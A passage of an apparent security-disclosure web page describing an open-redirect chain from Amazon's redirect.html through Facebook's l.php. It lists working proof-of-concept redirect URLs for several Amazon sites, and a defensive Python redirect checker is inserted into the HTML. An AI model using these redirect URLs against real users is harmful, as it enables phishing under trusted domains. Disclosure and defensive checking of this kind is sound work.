better secure their products and to publicly acknowledge and fix flaws
rather than hide them. Vendor legal intimidation and censorship attempts
are not tolerated here!" All of the following web security issues have been
published here: Buffer overflow, HTTP Response Splitting (CRLF), CMD
Injection, SQL injection, Phishing, Cross-site scripting, CSRF,
Cyber-attack, Unvalidated Redirects and Forwards, Information Leakage,
Denial of Service, File Inclusion, Weak Encryption, Privilege
Escalation, Directory Traversal, HTML Injection, Spam. A large number of
Facebook bugs have been published here. FD also publishes suggestions,
advisories and solution details related to Open Redirect vulnerabilities,
and cyber-intelligence recommendations.</span></div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><b>(4) </b><b>Amazon Covert Redirect Security Vulnerability Based on Facebook </b></span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><b><br /></b></span></div>
</div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;">Since Facebook is trusted by large numbers of other websites, those vulnerabilities can be used to perform a "<a href="http://tetraph.com/covert_redirect/oauth2_openid_covert_redirect.html">Covert Redirect</a>" to other websites such as Amazon.</span></div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;">Domain: </span></div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><a href="http://www.amazon.com/">http://www.amazon.com</a></span></div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;">"American
electronic commerce company with headquarters in Seattle, Washington.
It is the largest Internet-based retailer in the United States.
Amazon.com started as an online bookstore, but soon diversified, selling
DVDs, Blu-rays, CDs, video downloads/streaming, MP3
downloads/streaming, software, video games, electronics, apparel,
furniture, food, toys and jewelry. The company also produces consumer
electronics—notably, Amazon Kindle e-book readers, Fire tablets, Fire TV
and Fire Phone — and is a major provider of cloud computing services.
Amazon also sells certain low-end products like USB cables under its
inhouse brand AmazonBasics. Amazon has separate retail websites for
United States, United Kingdom & Ireland, France, Canada, Germany,
The Netherlands, Italy, Spain, Australia, Brazil, Japan, China, India
and Mexico. Amazon also offers international shipping to certain other
countries for some of its products. In 2011, it had professed an
intention to launch its websites in Poland and Sweden." (Wikipedia)</span></div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;">The vulnerability exists on the "redirect.html?" page, in the "&location" parameter, e.g.</span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<a href="http://www.amazon.com/gp/redirect.html?_encoding=UTF8&location=http%3A%2F%2Fwww.facebook.com%2Fl.php%3Fu%3Dhttp%253A%252F%252Fwww.google.com%26h%3D7AQFwCeYDAQEZsz_cx9BJKCE5Af7KKocYw4jOlGk5TB5kZg&token=6BD0FB927CC51E76FF446584B1040F70EA7E88E1" target="_blank"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://www.amazon.com/gp/<wbr></wbr>redirect.html?_encoding=UTF8&<wbr></wbr>location=http%3A%2F%2Fwww.<wbr></wbr>facebook.com%2Fl.php%3Fu%<wbr></wbr>3Dhttp%253A%252F%252Fwww.<wbr></wbr>google.com%26h%<wbr></wbr>3D7AQFwCeYDAQEZsz_<wbr></wbr>cx9BJKCE5Af7KKocYw4jOlGk5TB5kZ<wbr></wbr>g&token=<wbr></wbr>6BD0FB927CC51E76FF446584B1040F<wbr></wbr>70EA7E88E1</span></a></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><b>More Details:</b></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<a href="http://tetraph.com/covert_redirect/" target="_blank"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://tetraph.com/covert_<wbr></wbr>redirect/</span></a></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><a href="http://tetraph.com/covert_redirect/oauth2_openid_covert_redirect.html" target="_blank">http://tetraph.com/covert_<wbr></wbr>redirect/oauth2_openid_covert_<wbr></wbr>redirect.html</a></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><b>(4.1)</b> When
a user is redirected from Amazon to another site, Amazon checks the
"&token" parameter. If the redirect URL's domain is OK, Amazon
allows the redirection.</span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;">However,
if URLs in an approved redirect domain have open URL redirection
vulnerabilities themselves, a user can be redirected from Amazon to a
vulnerable URL in that domain first and then on from that vulnerable site
to a malicious site. The effect is the same as being redirected from
Amazon directly.</span></div>
</div>
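The chaining described in (4.1) is exactly what a first-hop domain check misses. As an added example (not Amazon's or Facebook's code), the Python below takes an Amazon-style redirect.html URL from this page, applies the first-hop check the text describes, and then unwraps nested URL-valued parameters such as l.php's "u" offline to judge the final destination; the allowlist and the list of parameter names are assumptions constructed for the example.

```python
"""
Chain-aware redirect check (added example, not Amazon's or Facebook's code).

Section (4.1) describes a first-hop check: the host of the "location"
parameter is compared against approved domains.  The page's point is that an
approved host (www.facebook.com) itself exposes a redirector, l.php?u=...,
so the effective destination is whatever the nested "u" parameter names.
The functions below apply the first-hop check and then unwrap nested
URL-valued query parameters, without any network access, to judge the
final destination.  ALLOWED_HOSTS and URL_PARAM_NAMES are constructed for
this example and are not Amazon's actual configuration.
"""
from urllib.parse import parse_qs, unquote, urlsplit

# Constructed allowlist of hosts the redirect endpoint may send users to.
ALLOWED_HOSTS = {"www.facebook.com", "facebook.com"}

# Constructed list of query parameters that commonly carry a nested URL;
# "u" is the one facebook.com/l.php uses in the POC URLs on this page.
URL_PARAM_NAMES = ("u", "url", "next", "location", "redirect", "target")

# The POC URL from section (4.2) of the page: Amazon -> facebook.com/l.php -> inzeed.com
POC_URL = (
    "http://www.amazon.com/gp/redirect.html?_encoding=UTF8"
    "&location=http%3A%2F%2Fwww.facebook.com%2Fl.php%3Fu%3Dhttp%253A%252F%252F"
    "www.inzeed.com%26h%3D7AQFwCeYDAQEZsz_cx9BJKCE5Af7KKocYw4jOlGk5TB5kZg"
    "&token=6BD0FB927CC51E76FF446584B1040F70EA7E88E1"
)

# The "Vulnerable URL" from the page: same endpoint, but location carries no nested URL.
DIRECT_URL = (
    "http://www.amazon.com/gp/redirect.html?_encoding=UTF8"
    "&location=http%3A%2F%2Fwww.facebook.com%2Famazon%3Fv%3Dapp_165157536856903"
    "&token=6BD0FB927CC51E76FF446584B1040F70EA7E88E1"
)


def host_of(url: str) -> str:
    """Hostname of a URL, lower-cased; urlsplit drops userinfo such as 'trusted@evil'."""
    return (urlsplit(url).hostname or "").lower()


def first_hop_check(location: str) -> bool:
    """The check the page describes: only the host of the first hop is examined."""
    return host_of(location) in ALLOWED_HOSTS


def nested_destination(url: str):
    """Return the first URL-valued query parameter of `url`, or None if there is none."""
    params = parse_qs(urlsplit(url).query, keep_blank_values=True)
    for name in URL_PARAM_NAMES:
        for value in params.get(name, []):
            # parse_qs decoded one layer; a second unquote catches double-encoded values.
            candidate = unquote(value)
            if candidate.lower().startswith(("http://", "https://", "//")):
                return candidate
    return None


def resolve_chain(url: str, max_depth: int = 5):
    """Follow nested URL parameters offline; returns the list of hops, first to last."""
    hops = [url]
    for _ in range(max_depth):
        nxt = nested_destination(hops[-1])
        if nxt is None:
            break
        hops.append(nxt)
    return hops


def chain_aware_check(location: str):
    """Allow only if every hop, including the final destination, is on an allowed host."""
    hops = resolve_chain(location)
    offending = [h for h in hops if host_of(h) not in ALLOWED_HOSTS]
    return not offending, hops


def check_redirect_url(redirect_url: str) -> dict:
    """Pull `location` out of a redirect.html-style URL and report both verdicts."""
    location = parse_qs(urlsplit(redirect_url).query).get("location", [""])[0]
    chain_ok, hops = chain_aware_check(location)
    return {
        "location": location,
        "first_hop_ok": first_hop_check(location),
        "chain_ok": chain_ok,
        "final_host": host_of(hops[-1]),
        "hops": hops,
    }


if __name__ == "__main__":
    for label, url in (("POC", POC_URL), ("direct", DIRECT_URL)):
        verdict = check_redirect_url(url)
        print(f"{label}: first-hop ok={verdict['first_hop_ok']}, "
              f"chain ok={verdict['chain_ok']}, final host={verdict['final_host']}")
```

For the page's POC URL the first-hop check passes (www.facebook.com) while the chain-aware check rejects it because the final hop is www.inzeed.com; the direct URL passes both.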
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;">One of the vulnerable domains is:</span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<a href="http://www.facebook.com/" target="_blank"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://www.facebook.com</span></a></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><b>(4.2)</b> Use one of the webpages for the following tests. The webpage address is "<a href="http://www.inzeed.com/kaleidoscope" target="_blank">http://www.inzeed.com/<wbr></wbr>kaleidoscope</a>". Suppose it is malicious.</span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><b>Vulnerable URL:</b></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<a href="http://www.amazon.com/gp/redirect.html?_encoding=UTF8&location=http%3A%2F%2Fwww.facebook.com%2Famazon%3Fv%3Dapp_165157536856903&token=6BD0FB927CC51E76FF446584B1040F70EA7E88E1" target="_blank"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://www.amazon.com/gp/<wbr></wbr>redirect.html?_encoding=UTF8&<wbr></wbr>location=http%3A%2F%2Fwww.<wbr></wbr>facebook.com%2Famazon%3Fv%<wbr></wbr>3Dapp_165157536856903&token=<wbr></wbr>6BD0FB927CC51E76FF446584B1040F<wbr></wbr>70EA7E88E1</span></a></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><b>POC:</b></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<a href="http://www.amazon.com/gp/redirect.html?_encoding=UTF8&location=http%3A%2F%2Fwww.facebook.com%2Fl.php%3Fu%3Dhttp%253A%252F%252Fwww.inzeed.com%26h%3D7AQFwCeYDAQEZsz_cx9BJKCE5Af7KKocYw4jOlGk5TB5kZg&token=6BD0FB927CC51E76FF446584B1040F70EA7E88E1" target="_blank"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://www.amazon.com/gp/<wbr></wbr>redirect.html?_encoding=UTF8&<wbr></wbr>location=http%3A%2F%2Fwww.<wbr></wbr>facebook.com%2Fl.php%3Fu%<wbr></wbr>3Dhttp%253A%252F%252Fwww.<wbr></wbr>inzeed.com%26h%<wbr></wbr>3D7AQFwCeYDAQEZsz_<wbr></wbr>cx9BJKCE5Af7KKocYw4jOlGk5TB5kZ<wbr></wbr>g&token=<wbr></wbr>6BD0FB927CC51E76FF446584B1040F<wbr></wbr>70EA7E88E1</span></a></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><a href="http://www.amazon.de/gp/redirect.html/ref=cm_sw_cl_fa_dp_1bI9sb0R0MNZH?_encoding=UTF8&location=http%3A%2F%2Fwww.facebook.com%2Fl.php%3Fu%3Dhttp%253A%252F%252Fwww.nicovideo.jp%20%26h%3D7AQFwCeYDAQEZsz_cx9BJKCE5Af7KKocYw4jOlGk5TB5kZg&token=6BD0FB927CC51E76FF446584B1040F70EA7E88E1">http://www.amazon.de/gp/<wbr></wbr>redirect.html/ref=cm_sw_cl_fa_<wbr></wbr>dp_1bI9sb0R0MNZH?_encoding=<wbr></wbr>UTF8&location=http%3A%2F%<wbr></wbr>2Fwww.facebook.com%2Fl.php%<wbr></wbr>3Fu%3Dhttp%253A%252F%252Fwww.<wbr></wbr>nicovideo.jp%26h%3D7AQFwCeYDAQEZsz_<wbr></wbr>cx9BJKCE5Af7KKocYw4jOlGk5TB5kZ<wbr></wbr>g&token=<wbr></wbr>6BD0FB927CC51E76FF446584B1040F<wbr></wbr>70EA7E88E1</a></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<a href="http://www.amazon.co.uk/gp/redirect.html/ref=cm_sw_cl_fa_dp_Zzbbtb04XETQB?_encoding=UTF8&location=http%3A%2F%2Fwww.facebook.com%2Fl.php%3Fu%3Dhttp%253A%252F%252Fwww.bbc.co.uk%26h%3D7AQFwCeYDAQEZsz_cx9BJKCE5Af7KKocYw4jOlGk5TB5kZg&token=6BD0FB927CC51E76FF446584B1040F70EA7E88E1" target="_blank"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://www.amazon.co.uk/gp/<wbr></wbr>redirect.html/ref=cm_sw_cl_fa_<wbr></wbr>dp_Zzbbtb04XETQB?_encoding=<wbr></wbr>UTF8&location=http%3A%2F%<wbr></wbr>2Fwww.facebook.com%2Fl.php%<wbr></wbr>3Fu%3Dhttp%253A%252F%252Fwww.<wbr></wbr>bbc.co.uk%26h%<wbr></wbr>3D7AQFwCeYDAQEZsz_<wbr></wbr>cx9BJKCE5Af7KKocYw4jOlGk5TB5kZ<wbr></wbr>g&token=<wbr></wbr>6BD0FB927CC51E76FF446584B1040F<wbr></wbr>70EA7E88E1</span></a></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<a href="http://www.amazon.ca/gp/redirect.html/ref=cm_sw_cl_fa_dp_G7uctb099ZX2N?_encoding=UTF8&location=http%3A%2F%2Fwww.facebook.com%2Fl.php%3Fu%3Dhttp%253A%252F%252Fgoogleadservices.com%26h%3D_AQHylR65AQG3dZfbwarP74zIO_Gj_ndx4h1QB1r7qbJx4Q&token=6BD0FB927CC51E76FF446584B1040F70EA7E88E1" target="_blank"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://www.amazon.ca/gp/<wbr></wbr>redirect.html/ref=cm_sw_cl_fa_<wbr></wbr>dp_G7uctb099ZX2N?_encoding=<wbr></wbr>UTF8&location=http%3A%2F%<wbr></wbr>2Fwww.facebook.com%2Fl.php%<wbr></wbr>3Fu%3Dhttp%253A%252F%<wbr></wbr>252Fgoogleadservices.com%26h%<wbr></wbr>3D_AQHylR65AQG3dZfbwarP74zIO_<wbr></wbr>Gj_ndx4h1QB1r7qbJx4Q&token=<wbr></wbr>6BD0FB927CC51E76FF446584B1040F<wbr></wbr>70EA7E88E1</span></a></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<a href="https://www.amazon.co.jp/gp/redirect.html/ref=amb_link_64307649_2?location=http%3A%2F%2Fwww.facebook.com%2Fl.php%3Fu%3Dhttp%253A%252F%252Fwww.pornhub.com%26h%3D_AQHylR65AQG3dZfbwarP74zIO_Gj_ndx4h1QB1r7qbJx4Q&pf_rd_m=AN1VRQENFRJN5&pf_rd_s=left-2&pf_rd_r=15EZARSP2Q0PG0JW0ZB0&pf_rd_t=101&pf_rd_p=122450949&pf_rd_i=2221688051" target="_blank"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">https://www.amazon.co.jp/gp/<wbr></wbr>redirect.html/ref=amb_link_<wbr></wbr>64307649_2?location=http%3A%<wbr></wbr>2F%2Fwww.facebook.com%2Fl.php%<wbr></wbr>3Fu%3Dhttp%253A%252F%252Fwww.<wbr></wbr>pornhub.com%26h%3D_<wbr></wbr>AQHylR65AQG3dZfbwarP74zIO_Gj_<wbr></wbr>ndx4h1QB1r7qbJx4Q&pf_rd_m=<wbr></wbr>AN1VRQENFRJN5&pf_rd_s=left-2&<wbr></wbr>pf_rd_r=15EZARSP2Q0PG0JW0ZB0&<wbr></wbr>pf_rd_t=101&pf_rd_p=122450949&<wbr></wbr>pf_rd_i=2221688051</span></a></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<a href="https://www.amazon.fr/gp/redirect.html/ref=amb_link_64307649_2?location=http%3A%2F%2Fwww.facebook.com%2Fl.php%3Fu%3Dhttp%253A%252F%252Fwww.naver.com%26h%3D_AQHylR65AQG3dZfbwarP74zIO_Gj_ndx4h1QB1r7qbJx4Q&pf_rd_m=AN1VRQENFRJN5&pf_rd_s=left-2&pf_rd_r=15EZARSP2Q0PG0JW0ZB0&pf_rd_t=101&pf_rd_p=122450949&pf_rd_i=2221688051" target="_blank"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">https://www.amazon.fr/gp/<wbr></wbr>redirect.html/ref=amb_link_<wbr></wbr>64307649_2?location=http%3A%<wbr></wbr>2F%2Fwww.facebook.com%2Fl.php%<wbr></wbr>3Fu%3Dhttp%253A%252F%252Fwww.<wbr></wbr>naver.com%26h%3D_<wbr></wbr>AQHylR65AQG3dZfbwarP74zIO_Gj_<wbr></wbr>ndx4h1QB1r7qbJx4Q&pf_rd_m=<wbr></wbr>AN1VRQENFRJN5&pf_rd_s=left-2&<wbr></wbr>pf_rd_r=15EZARSP2Q0PG0JW0ZB0&<wbr></wbr>pf_rd_t=101&pf_rd_p=122450949&<wbr></wbr>pf_rd_i=2221688051</span></a></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
